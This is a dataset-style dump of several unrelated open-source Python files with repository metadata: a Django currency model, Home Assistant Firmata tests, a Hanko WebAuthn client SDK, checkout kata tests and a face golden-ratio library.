] | null | null | null | backend/apps/currency/models.py | jorgejimenez98/backend-evaluacion-desempenno | 08975303952608809375c5e2185bf20a84cc0f4e | [
"MIT"
] | null | null | null | backend/apps/currency/models.py | jorgejimenez98/backend-evaluacion-desempenno | 08975303952608809375c5e2185bf20a84cc0f4e | [
"MIT"
] | null | null | null | from django.db import models
class Currency(models.Model):
id = models.IntegerField(primary_key=True) # id_moneda
acronym = models.CharField(max_length=218) # cod_mone
description = models.CharField(max_length=218) # desc_mone
active = models.BooleanField() # activo
def __str__(self):
return f'Currency {self.description}'
| 29.916667 | 63 | 0.715877 | 45 | 359 | 5.488889 | 0.688889 | 0.121457 | 0.145749 | 0.194332 | 0.218623 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020478 | 0.183844 | 359 | 11 | 64 | 32.636364 | 0.822526 | 0.097493 | 0 | 0 | 0 | 0 | 0.08464 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.125 | 0.125 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
91c3458625a3b5858b98d457edd962749cf9c352 | 130 | py | Python | Python/map-reduce/map.py | zhangymPerson/Script_Test | fb8b8a339dddcb5650181ed9bded481a7229e2bb | [
"Apache-2.0"
] | null | null | null | Python/map-reduce/map.py | zhangymPerson/Script_Test | fb8b8a339dddcb5650181ed9bded481a7229e2bb | [
"Apache-2.0"
] | null | null | null | Python/map-reduce/map.py | zhangymPerson/Script_Test | fb8b8a339dddcb5650181ed9bded481a7229e2bb | [
"Apache-2.0"
] | null | null | null | #/usr/bin/env python
#
import sys
print "begining ..."
for word in sys.stdin:
ss= word.split(" ")
for w in ss:
print w
| 9.285714 | 22 | 0.607692 | 22 | 130 | 3.590909 | 0.681818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.246154 | 130 | 13 | 23 | 10 | 0.806122 | 0.146154 | 0 | 0 | 0 | 0 | 0.122642 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.166667 | null | null | 0.333333 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
91d54127d5b551e1a51e340f461bf9369c8b43db | 1,140 | py | Python | geckordp/actors/accessibility/accessible.py | reapler/geckordp | 29dab2e6e691954a473e054fa95ba40a3ad10e53 | [
"MIT"
] | 1 | 2021-12-24T04:37:02.000Z | 2021-12-24T04:37:02.000Z | geckordp/actors/accessibility/accessible.py | jpramosi/geckordp | 29dab2e6e691954a473e054fa95ba40a3ad10e53 | [
"MIT"
] | 1 | 2021-07-23T13:38:36.000Z | 2021-08-07T14:17:54.000Z | geckordp/actors/accessibility/accessible.py | reapler/geckordp | 29dab2e6e691954a473e054fa95ba40a3ad10e53 | [
"MIT"
] | 1 | 2021-10-31T17:31:35.000Z | 2021-10-31T17:31:35.000Z | from geckordp.actors.actor import Actor
class AccessibleActor(Actor):
""" https://github.com/mozilla/gecko-dev/blob/master/devtools/shared/specs/accessibility.js#L46
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def audit(self, options: dict = None):
if (options is None):
options = {}
return self.client.send_receive({
"to": self.actor_id,
"type": "audit",
"options": options,
})
def children(self):
return self.client.send_receive({
"to": self.actor_id,
"type": "children",
}, "children")
def get_relations(self):
return self.client.send_receive({
"to": self.actor_id,
"type": "getRelations",
}, "relations")
def hydrate(self):
return self.client.send_receive({
"to": self.actor_id,
"type": "hydrate",
}, "properties")
def snapshot(self):
return self.client.send_receive({
"to": self.actor_id,
"type": "snapshot",
}, "snapshot")
| 26.511628 | 99 | 0.539474 | 117 | 1,140 | 5.094017 | 0.401709 | 0.083893 | 0.134228 | 0.167785 | 0.395973 | 0.395973 | 0.395973 | 0.395973 | 0.395973 | 0.395973 | 0 | 0.002554 | 0.313158 | 1,140 | 42 | 100 | 27.142857 | 0.758621 | 0.079825 | 0 | 0.3125 | 0 | 0 | 0.108004 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1875 | false | 0 | 0.03125 | 0.125 | 0.40625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
91db94052cc4ac22420e01f870977469d87acbb9 | 3,391 | py | Python | tests/components/firmata/test_config_flow.py | tbarbette/core | 8e58c3aa7bc8d2c2b09b6bd329daa1c092d52d3c | [
"Apache-2.0"
] | 11 | 2018-02-16T15:35:47.000Z | 2020-01-14T15:20:00.000Z | tests/components/firmata/test_config_flow.py | jagadeeshvenkatesh/core | 1bd982668449815fee2105478569f8e4b5670add | [
"Apache-2.0"
] | 79 | 2020-07-23T07:13:37.000Z | 2022-03-22T06:02:37.000Z | tests/components/firmata/test_config_flow.py | jagadeeshvenkatesh/core | 1bd982668449815fee2105478569f8e4b5670add | [
"Apache-2.0"
] | 14 | 2018-08-19T16:28:26.000Z | 2021-09-02T18:26:53.000Z | """Test the Firmata config flow."""
from unittest.mock import patch
from pymata_express.pymata_express_serial import serial
from homeassistant import config_entries, setup
from homeassistant.components.firmata.const import CONF_SERIAL_PORT, DOMAIN
from homeassistant.const import CONF_NAME
from homeassistant.core import HomeAssistant
async def test_import_cannot_connect_pymata(hass: HomeAssistant) -> None:
"""Test we fail with an invalid board."""
await setup.async_setup_component(hass, "persistent_notification", {})
with patch(
"homeassistant.components.firmata.board.PymataExpress.start_aio",
side_effect=RuntimeError,
):
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": config_entries.SOURCE_IMPORT},
data={CONF_SERIAL_PORT: "/dev/nonExistent"},
)
assert result["type"] == "abort"
assert result["reason"] == "cannot_connect"
async def test_import_cannot_connect_serial(hass: HomeAssistant) -> None:
"""Test we fail with an invalid board."""
await setup.async_setup_component(hass, "persistent_notification", {})
with patch(
"homeassistant.components.firmata.board.PymataExpress.start_aio",
side_effect=serial.serialutil.SerialException,
):
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": config_entries.SOURCE_IMPORT},
data={CONF_SERIAL_PORT: "/dev/nonExistent"},
)
assert result["type"] == "abort"
assert result["reason"] == "cannot_connect"
async def test_import_cannot_connect_serial_timeout(hass: HomeAssistant) -> None:
"""Test we fail with an invalid board."""
await setup.async_setup_component(hass, "persistent_notification", {})
with patch(
"homeassistant.components.firmata.board.PymataExpress.start_aio",
side_effect=serial.serialutil.SerialTimeoutException,
):
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": config_entries.SOURCE_IMPORT},
data={CONF_SERIAL_PORT: "/dev/nonExistent"},
)
assert result["type"] == "abort"
assert result["reason"] == "cannot_connect"
async def test_import(hass: HomeAssistant) -> None:
"""Test we create an entry from config."""
await setup.async_setup_component(hass, "persistent_notification", {})
with patch(
"homeassistant.components.firmata.board.PymataExpress", autospec=True
), patch(
"homeassistant.components.firmata.async_setup", return_value=True
) as mock_setup, patch(
"homeassistant.components.firmata.async_setup_entry", return_value=True
) as mock_setup_entry:
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": config_entries.SOURCE_IMPORT},
data={CONF_SERIAL_PORT: "/dev/nonExistent"},
)
assert result["type"] == "create_entry"
assert result["title"] == "serial-/dev/nonExistent"
assert result["data"] == {
CONF_NAME: "serial-/dev/nonExistent",
CONF_SERIAL_PORT: "/dev/nonExistent",
}
await hass.async_block_till_done()
assert len(mock_setup.mock_calls) == 1
assert len(mock_setup_entry.mock_calls) == 1
| 36.462366 | 81 | 0.676792 | 374 | 3,391 | 5.906417 | 0.197861 | 0.052965 | 0.095066 | 0.095066 | 0.74287 | 0.717972 | 0.639656 | 0.639656 | 0.639656 | 0.639656 | 0 | 0.000749 | 0.212622 | 3,391 | 92 | 82 | 36.858696 | 0.826592 | 0.008552 | 0 | 0.529412 | 0 | 0 | 0.21498 | 0.147289 | 0 | 0 | 0 | 0 | 0.161765 | 1 | 0 | false | 0 | 0.205882 | 0 | 0.205882 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
91e736ee7fc3926690b4de561f1c73a66f3ce173 | 827 | py | Python | my_studyguide/math1.py | worldwidekatie/study_guide | bc7a67f331990d07463c6ac9413eef283e555ad0 | [
"MIT"
] | null | null | null | my_studyguide/math1.py | worldwidekatie/study_guide | bc7a67f331990d07463c6ac9413eef283e555ad0 | [
"MIT"
] | null | null | null | my_studyguide/math1.py | worldwidekatie/study_guide | bc7a67f331990d07463c6ac9413eef283e555ad0 | [
"MIT"
] | null | null | null |
class Math1():
def __init__(self):
self.my_num1 = 10
self.my_num2 = 20
def addition(self):
return self.my_num1 + self.my_num2
def subtraction(self):
return self.my_num1 - self.my_num2
class Math_Plus(Math1):
def __init__(self, my_num1=40, my_num2=90):
self.my_num1 = my_num1
self.my_num2 = my_num2
def multiplication(self):
return self.my_num1 * self.my_num2
def division(self):
return self.my_num1 / self.my_num2
if __name__ == "__main__":
math1 = Math1()
print(math1.addition()) #30
print(math1.subtraction()) #-10
math_plus = Math_Plus()
print(math_plus.addition()) #130
print(math_plus.subtraction()) #-50
print(math_plus.multiplication()) #3600
print(math_plus.division()) #0.-44444444 | 21.763158 | 47 | 0.633615 | 114 | 827 | 4.254386 | 0.254386 | 0.160825 | 0.14433 | 0.123711 | 0.292784 | 0.259794 | 0.259794 | 0.259794 | 0.136082 | 0 | 0 | 0.083467 | 0.246675 | 827 | 38 | 48 | 21.763158 | 0.695024 | 0.031439 | 0 | 0 | 0 | 0 | 0.010076 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.24 | false | 0 | 0 | 0.16 | 0.48 | 0.24 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
37cf3d15f9cd1cb5484c999c6e3976d53be87251 | 14,805 | py | Python | src/hanko_sdk/client.py | teamhanko/hanko-python | 2455861b6edc3c393dde7ed62635f96c88b1350f | [
"Apache-2.0"
] | 1 | 2022-03-08T06:38:22.000Z | 2022-03-08T06:38:22.000Z | src/hanko_sdk/client.py | teamhanko/hanko-python | 2455861b6edc3c393dde7ed62635f96c88b1350f | [
"Apache-2.0"
] | null | null | null | src/hanko_sdk/client.py | teamhanko/hanko-python | 2455861b6edc3c393dde7ed62635f96c88b1350f | [
"Apache-2.0"
] | null | null | null | from abc import ABC, abstractmethod
from enum import Enum
from typing import Type, Optional, List
from requests import Request, Session, PreparedRequest
from . import json_serializer
from .auth import HankoAuth
from .config import HankoHttpClientConfig
import logging
from .exceptions.hanko_exceptions import HankoAuthenticationException, HankoNotFoundException, HankoUnexpectedException
from .models.authentication_finalization import AuthenticationFinalizationRequest, AuthenticationFinalizationResponse
from .models.authentication_initialization import AuthenticationInitializationRequest, \
AuthenticationInitializationResponse
from .models.base_model import BaseModel
from .models.core import Credential
from .models.core import CredentialList
from .models.credential_query import CredentialQuery
from .models.credential_update import CredentialUpdateRequest
from .models.registration_finalization import RegistrationFinalizationRequest, RegistrationFinalizationResponse
from .models.registration_initialization import RegistrationInitializationRequest, RegistrationInitializationResponse
from .models.transaction_finalization import TransactionFinalizationRequest, TransactionFinalizationResponse
from .models.transaction_initialization import TransactionInitializationRequest, TransactionInitializationResponse
from .utils import url_utils
class BaseHankoClient(ABC):
""" Defines the Hanko API interface. """
@abstractmethod
def initialize_registration(self, request: RegistrationInitializationRequest) -> RegistrationInitializationResponse:
""" Initializes the registration of a new credential using a :py:class:`RegistrationInitializationRequest`.
On successful initialization, the Hanko Authentication API returns a
:py:class:`RegistrationInitializationResponse`. Send the response to your client application in order to
pass it to the browser's WebAuthn API's ``navigator.credentials.create()`` function.
:param request: The RegistrationInitializationRequest.
:return: A RegistrationInitializationResponse object.
"""
pass
@abstractmethod
def finalize_registration(self, request: RegistrationFinalizationRequest) -> RegistrationFinalizationResponse:
""" Finalizes the registration request initiated by ``initialize_registration``. Provide a
:py:class:`RegistrationFinalizationRequest` which represents the result of calling the browser's WebAuthn API's
``navigator.credentials.create()`` function.
:param request: The RegistrationFinalizationRequest.
:return: A RegistrationFinalizationResponse. """
pass
@abstractmethod
def initialize_authentication(self, request: AuthenticationInitializationRequest) -> AuthenticationInitializationResponse:
""" Initializes an authentication with a registered credential using an
:py:class:`AuthenticationInitializationRequest`. On successful initialization, the Hanko Authentication API
returns an :py:class:`AuthenticationInitializationResponse`. Send the response to your client application in
order to pass it to the browser's WebAuthn API's ``navigator.credentials.get()`` function.
:param request: The AuthenticationInitializationRequest.
:return: An AuthenticationInitializationResponse. """
pass
@abstractmethod
def finalize_authentication(self, request: AuthenticationFinalizationRequest) -> AuthenticationFinalizationResponse:
""" Finalizes the authentication request initiated by ``initialize_authentication``. Provide
an :py:class:`AuthenticationFinalizationRequest` which represents the result of calling the browser's
WebAuthn API's ``navigator.credentials.get()`` function.
:param request: The AuthenticationFinalizationRequest.
:return: An AuthenticationFinalizationResponse. """
pass
@abstractmethod
def initialize_transaction(self, request: TransactionInitializationRequest) -> TransactionInitializationResponse:
""" Initiates a transaction. A transaction operation is analogous to the authentication operation,
with the main difference being that a transaction context must be provided in the form of a string.
This value will become part of the challenge an authenticator signs over during the operation.
Initialize a transaction using a :py:class:`TransactionInitializationRequest`. On successful initialization,
the Hanko Authentication API returns a :py:class:`TransactionInitializationResponse`. Send the response to
your client application in order to pass it to the browser's WebAuthn API's
``navigator.credentials.get()`` function.
:param request: The TransactionInitializationRequest.
:return: A TransactionInitializationResponse. """
pass
@abstractmethod
def finalize_transaction(self, request: TransactionFinalizationRequest) -> TransactionFinalizationResponse:
""" Finalizes the transaction request initiated by ``initialize_transaction``. Provide a
:py:class:`TransactionFinalizationRequest` which represents the result of calling of the browser's WebAuthn
API's ``navigator.credentials.get()`` function.
:param request: The TransactionFinalizationRequest.
:return: A TransactionFinalizationResponse. """
pass
@abstractmethod
def list_credentials(self, credential_query: CredentialQuery) -> List[Credential]:
""" Returns a list of :py:class:`Credential`. Filter by ``user_id`` and paginate results using a
:py:class:`CredentialQuery`. The value for ``page_size`` defaults to ``10`` and the value for
``page`` to ``1``.
:param credential_query: The CredentialQuery.
:return: A list of Credential objects. """
pass
@abstractmethod
def get_credential(self, credential_id: str) -> Credential:
""" Returns the :py:class:`Credential` with the specified ``credential_id``.
:param credential_id: The id of the Credential to retrieve.
:return: The Credential. """
pass
@abstractmethod
def delete_credential(self, credential_id: str):
""" Deletes the :py:class:`Credential` with the specified ``credential_id``.
:param credential_id: The id of the credential to delete. """
pass
@abstractmethod
def update_credential(self, credential_id: str, request: CredentialUpdateRequest) -> Credential:
""" Updates the :py:class:`Credential` with the specified ``credential_id``. Provide a
:py:class:`CredentialUpdateRequest` with the updated data. Currently, you can only update the name of a
:py:class:`Credential`.
:param credential_id: The id of the Credential to update.
:param request: The CredentialUpdateRequest.
:return: The updated Credential. """
pass
class RequestMethod(Enum):
GET = "GET"
POST = "POST"
PUT = "PUT"
DELETE = "DELETE"
class HankoHttpClient(BaseHankoClient):
""" A HTTP implementation of :py:class:`BaseHankoClient`. """
PATH_WEBAUTHN_BASE = "webauthn"
PATH_REGISTRATION_INITIALIZE = "registration/initialize"
PATH_REGISTRATION_FINALIZE = "registration/finalize"
PATH_AUTHENTICATION_INITIALIZE = "authentication/initialize"
PATH_AUTHENTICATION_FINALIZE = "authentication/finalize"
PATH_TRANSACTION_INITIALIZE = "transaction/initialize"
PATH_TRANSACTION_FINALIZE = "transaction/finalize"
PATH_CREDENTIALS = "credentials"
def __init__(self, config: HankoHttpClientConfig, logger: logging.Logger = None):
""" Constructs a :py:class:`HankoHttpClient`.
:param config: A Hanko configuration.
:param logger: An optional Logger object. """
self.__config = config
self.__logger = logger
self.__session = Session()
def __del__(self):
if self.__session is not None:
self.__session.close()
def __build_url(self, path: str) -> str:
""" Builds an absolute Hanko API URL.
:param path: The API endpoint path.
:return: An absolute Hanko API URL. """
return url_utils.build_url(self.__config.base_url, self.__config.api_version, HankoHttpClient.PATH_WEBAUTHN_BASE, path)
def __prepare_request(self, request_path: str, method: RequestMethod, body: Optional[BaseModel], query_parameters: Optional[dict]) -> PreparedRequest:
""" Creates and prepares a :py:class:`Request` object with the given parameters.
:param request_path: The API endpoint path.
:param method: The HTTP method to use for the request.
:param body: The request body.
:param query_parameters: The query parameters.
:return: A PreparedRequest. """
url = self.__build_url(request_path)
body_json = None
if body is not None:
body_json = json_serializer.serialize(body)
request = Request(method.value, url, data=body_json, auth=HankoAuth(self.__config, url_utils.remove_base(url, self.__config.base_url)), params=query_parameters)
return request.prepare()
def __log_request(self, request: PreparedRequest):
""" Logs the request parameter using the ``logger``.
:param request: The request to be logged. """
if self.__logger is not None:
self.__logger.info("-- BEGIN Hanko API Request --")
self.__logger.info("request method: %s", request.method)
self.__logger.info("request URL: %s", request.path_url)
self.__logger.info("authorization: %s", request.headers.get("Authorization", "none"))
self.__logger.info("body: %s", request.body)
self.__logger.info("-- END Hanko API Request --")
def __make_request(self, request_path: str, method: RequestMethod, body: Optional[BaseModel], query_parameters: Optional[dict], response_type: Optional[Type[BaseModel]]):
""" Performs a HTTP request to the Hanko API with the given body and query parameters. Returns and deserializes
the response as the given type ``response_type``.
The body, if not null, is serialized to a JSON string using the ``json_serializer`` module.
The query_parameters parameter, also optional, is used to build the request query parameters.
:param request_path: The API endpoint path.
:param method: The HTTP method to use for the request.
:param body: The request body.
:param query_parameters: The query parameters.
:param response_type: The type the API response to be deserialized as.
:return: The response body, deserialized as response_type. """
request = self.__prepare_request(request_path, method, body, query_parameters)
self.__log_request(request)
response = self.__session.send(request)
if response.ok:
if response_type is not None and response.text is not None and len(response.text) > 0:
response_object = json_serializer.deserialize_string(response.text, response_type)
return response_object
else:
return None
if response.status_code == 401:
raise HankoAuthenticationException(response.text, response.status_code, request.path_url)
elif response.status_code == 404:
raise HankoNotFoundException(response.text, response.status_code, request.path_url)
raise HankoUnexpectedException(response.text, response.status_code, request.path_url)
def initialize_registration(self, request: RegistrationInitializationRequest) -> RegistrationInitializationResponse:
response = self.__make_request(HankoHttpClient.PATH_REGISTRATION_INITIALIZE, RequestMethod.POST, request, None, RegistrationInitializationResponse)
return response
def finalize_registration(self, request: RegistrationFinalizationRequest) -> RegistrationFinalizationResponse:
response = self.__make_request(HankoHttpClient.PATH_REGISTRATION_FINALIZE, RequestMethod.POST, request, None, RegistrationFinalizationResponse)
return response
def initialize_authentication(self, request: AuthenticationInitializationRequest) -> AuthenticationInitializationResponse:
response = self.__make_request(HankoHttpClient.PATH_AUTHENTICATION_INITIALIZE, RequestMethod.POST, request, None, AuthenticationInitializationResponse)
return response
def finalize_authentication(self, request: AuthenticationFinalizationRequest) -> AuthenticationFinalizationResponse:
response = self.__make_request(HankoHttpClient.PATH_AUTHENTICATION_FINALIZE, RequestMethod.POST, request, None, AuthenticationFinalizationResponse)
return response
def initialize_transaction(self, request: TransactionInitializationRequest) -> TransactionInitializationResponse:
response = self.__make_request(HankoHttpClient.PATH_TRANSACTION_INITIALIZE, RequestMethod.POST, request, None, TransactionInitializationResponse)
return response
def finalize_transaction(self, request: TransactionFinalizationRequest) -> TransactionFinalizationResponse:
response = self.__make_request(HankoHttpClient.PATH_TRANSACTION_FINALIZE, RequestMethod.POST, request, None, TransactionFinalizationResponse)
return response
def list_credentials(self, credential_query: CredentialQuery) -> List[Credential]:
query_parameters = credential_query.to_json_serializable() if credential_query is not None else {}
response: CredentialList = self.__make_request(HankoHttpClient.PATH_CREDENTIALS, RequestMethod.GET, None, query_parameters, CredentialList)
return response.credentials if response is not None else []
def get_credential(self, credential_id: str) -> Credential:
path = "{}/{}".format(HankoHttpClient.PATH_CREDENTIALS, credential_id)
response = self.__make_request(path, RequestMethod.GET, None, None, Credential)
return response
def delete_credential(self, credential_id: str):
path = "{}/{}".format(HankoHttpClient.PATH_CREDENTIALS, credential_id)
self.__make_request(path, RequestMethod.DELETE, None, None, None)
def update_credential(self, credential_id: str, request: CredentialUpdateRequest) -> Credential:
path = "{}/{}".format(HankoHttpClient.PATH_CREDENTIALS, credential_id)
response = self.__make_request(path, RequestMethod.PUT, request, None, Credential)
return response
| 51.40625 | 174 | 0.7282 | 1,477 | 14,805 | 7.142857 | 0.150305 | 0.012607 | 0.008341 | 0.017441 | 0.413744 | 0.376588 | 0.37346 | 0.215545 | 0.189953 | 0.169194 | 0 | 0.000841 | 0.196893 | 14,805 | 287 | 175 | 51.585366 | 0.886459 | 0.338129 | 0 | 0.366906 | 0 | 0 | 0.035196 | 0.012737 | 0 | 0 | 0 | 0 | 0 | 1 | 0.18705 | false | 0.071942 | 0.151079 | 0 | 0.539568 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 2 |
37d53d6476d58a9b26178ba2961b262e7af95e51 | 1,450 | py | Python | test/solution_tests/CHK/test_round_4.py | DPNT-Sourcecode/CHK-anrv01 | 84ff4fb65a416c87f0f18a76fec14bf525c81196 | [
"Apache-2.0"
] | null | null | null | test/solution_tests/CHK/test_round_4.py | DPNT-Sourcecode/CHK-anrv01 | 84ff4fb65a416c87f0f18a76fec14bf525c81196 | [
"Apache-2.0"
] | null | null | null | test/solution_tests/CHK/test_round_4.py | DPNT-Sourcecode/CHK-anrv01 | 84ff4fb65a416c87f0f18a76fec14bf525c81196 | [
"Apache-2.0"
] | null | null | null | import json
from lib.solutions.CHK.checkout_solution import checkout
import string
import importlib.resources
class Test:
def test_k_functionality(self):
input_skus = "KK"
total_value = checkout(input_skus)
assert total_value == 120
def test_n_functionality(self):
input_skus = "NNNM"
total_value = checkout(input_skus)
assert total_value == 120
def test_p_functionality(self):
input_skus = "PPPPP"
total_value = checkout(input_skus)
assert total_value == 200
def test_q_functionality(self):
input_skus = "QQQQQQ"
total_value = checkout(input_skus)
assert total_value == 160
def test_r_functionality(self):
input_skus = "RRRQ"
total_value = checkout(input_skus)
assert total_value == 150
def test_u_functionality(self):
input_skus = "UUUU"
total_value = checkout(input_skus)
assert total_value == 120
def test_v_functionality(self):
input_skus = "VVV"
total_value = checkout(input_skus)
assert total_value == 130
def test_each_sku_added(self):
with importlib.resources.open_text("lib.solutions.CHK.sku_data", "sku_items_and_prices.json") as sku_data:
sku_values = json.load(sku_data)
for char in string.ascii_uppercase:
total_value = checkout(char)
assert total_value == sku_values[char]
| 29 | 114 | 0.661379 | 182 | 1,450 | 4.950549 | 0.318681 | 0.17758 | 0.159822 | 0.201998 | 0.36737 | 0.36737 | 0.36737 | 0.36737 | 0.176471 | 0.176471 | 0 | 0.019608 | 0.261379 | 1,450 | 49 | 115 | 29.591837 | 0.821662 | 0 | 0 | 0.25641 | 0 | 0 | 0.054483 | 0.035172 | 0 | 0 | 0 | 0 | 0.205128 | 1 | 0.205128 | false | 0 | 0.128205 | 0 | 0.358974 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
37d62de479405daa675c787823c9905b45f73cef | 5,108 | py | Python | Library Source/__init__.py | Aksoylu/GoldenFace | 10bdc6861b9d6bdb0cbfd3cd5917cb28eaeadc18 | [
"MIT"
] | 9 | 2021-05-20T15:48:28.000Z | 2022-03-19T09:49:33.000Z | Library Source/__init__.py | Aksoylu/GoldenFace | 10bdc6861b9d6bdb0cbfd3cd5917cb28eaeadc18 | [
"MIT"
] | null | null | null | Library Source/__init__.py | Aksoylu/GoldenFace | 10bdc6861b9d6bdb0cbfd3cd5917cb28eaeadc18 | [
"MIT"
] | 2 | 2021-08-23T15:47:06.000Z | 2022-03-17T00:37:03.000Z | #-- GoldenFace 1.0 (Face Golden Ratio & Cosine Similarity Library)--
# Author : Umit Aksoylu
# Date : 15.05.2020
# Description : Facial Cosine Similarity,Face Golden Ratio Calculation And Facial Landmark Detecting/Drawing Library
# Website : http://umit.space
# Mail : umit@aksoylu.space
# Github : https://github.com/Aksoylu/GoldenFace
import cv2
import GoldenFace.goldenMath
import GoldenFace.functions
import GoldenFace.landmark
import time
import pkg_resources
class goldenFace:
img = ""
image_gray = ""
landmark_detector = ""
face_detector = ""
faces = ""
facePoints = ""
faceBorders = ""
landmarks= ""
def __init__(self, path):
self.img = cv2.imread(path)
self.image_gray =cv2.cvtColor(self.img,cv2.COLOR_BGR2GRAY)
self.landmark_detector = cv2.face.createFacemarkLBF()
filepath = pkg_resources.resource_filename(__name__, "landmark.yaml")
self.landmark_detector.loadModel(filepath)
#self.landmark_detector.loadModel("/landmark.yaml")
self.face_detector = cv2.CascadeClassifier(cv2.data.haarcascades+'haarcascade_frontalface_default.xml')
self.faces = self.face_detector.detectMultiScale(self.image_gray, 1.3, 5)
for faceBorders in self.faces:
(x,y,w,h) = faceBorders
self.faceBorders = faceBorders
_, self.landmarks = self.landmark_detector.fit(self.image_gray, self.faces)
self.facePoints = landmark.detectLandmark(self.landmarks)
break
def drawFaceCover(self,color):
(x,y,w,h) = self.faceBorders
self.img = cv2.rectangle(self.img,(x,y),(x+w, y+h),color,2)
def drawLandmark(self,color):
self.img = landmark.drawLandmark(self.img, self.landmarks,color)
def drawMask(self,color):
self.img = goldenMath.drawMask(self.img,self.faceBorders,self.facePoints,color)
def drawTGSM(self,color):
self.img = goldenMath.drawTGSM(self.img,self.faceBorders,self.facePoints,color)
def drawVFM(self,color):
self.img = goldenMath.drawVFM(self.img,self.faceBorders,self.facePoints,color)
def drawTZM(self,color):
self.img = goldenMath.drawTZM(self.img,self.faceBorders,self.facePoints,color)
def drawLC(self,color):
self.img = goldenMath.drawLC(self.img,self.faceBorders,self.facePoints,color)
def drawTSM(self,color):
self.img = goldenMath.drawTSM(self.img,self.faceBorders,self.facePoints,color)
def calculateTGSM(self):
goldenMath.unitSize =goldenMath.calculateUnit(self.facePoints)
return goldenMath.calculateTGSM(self.faceBorders,self.facePoints)
def calculateVFM(self):
goldenMath.unitSize =goldenMath.calculateUnit(self.facePoints)
return goldenMath.calculateVFM(self.faceBorders,self.facePoints)
def calculateTZM(self):
goldenMath.unitSize =goldenMath.calculateUnit(self.facePoints)
return goldenMath.calculateTZM(self.faceBorders,self.facePoints)
def calculateTSM(self):
goldenMath.unitSize =goldenMath.calculateUnit(self.facePoints)
return goldenMath.calculateTSM(self.faceBorders,self.facePoints)
def calculateLC(self):
goldenMath.unitSize =goldenMath.calculateUnit(self.facePoints)
return goldenMath.calculateLC(self.faceBorders,self.facePoints)
def geometricRatio(self):
goldenMath.unitSize =goldenMath.calculateUnit(self.facePoints)
TZM = goldenMath.calculateTZM(self.faceBorders,self.facePoints)
TGSM = goldenMath.calculateTGSM(self.faceBorders,self.facePoints)
VFM = goldenMath.calculateVFM(self.faceBorders,self.facePoints)
TSM = goldenMath.calculateTSM(self.faceBorders,self.facePoints)
LC = goldenMath.calculateLC(self.faceBorders,self.facePoints)
avg = (TZM + TGSM + VFM + TZM + TSM +LC) /6
return 100- avg
def face2Vec(self):
goldenMath.unitSize =goldenMath.calculateUnit(self.facePoints)
vector = goldenMath.face2Vec(self.faceBorders,self.facePoints)
return vector
def faceSimilarity(self,vector2):
return goldenMath.vectorFaceSimilarity(self.face2Vec(),vector2)
#Golden similarity
def similarityRatio(self):
facevec = self.face2Vec()
filepath = pkg_resources.resource_filename(__name__, "landmark.yaml")
goldenFace = functions.loadFaceVec(filepath)
similarity = goldenMath.vectorFaceSimilarity(facevec,goldenFace)
return similarity
def getLandmarks(self):
return self.landmarks
def getFacialPoints(self):
return self.facePoints
def drawFacialPoints(self,color):
self.img = goldenMath.drawFacialPoints(self.img,self.facePoints,color)
def drawLandmarks(self,color):
self.img = goldenMath.drawLandmarks(self.img,self.landmarks,color)
def getFaceBorder(self):
return self.faceBorders
def writeImage(self,name):
cv2.imwrite(name, self.img)
def saveFaceVec(self,path):
functions.saveFaceVec(self.face2Vec(),path)
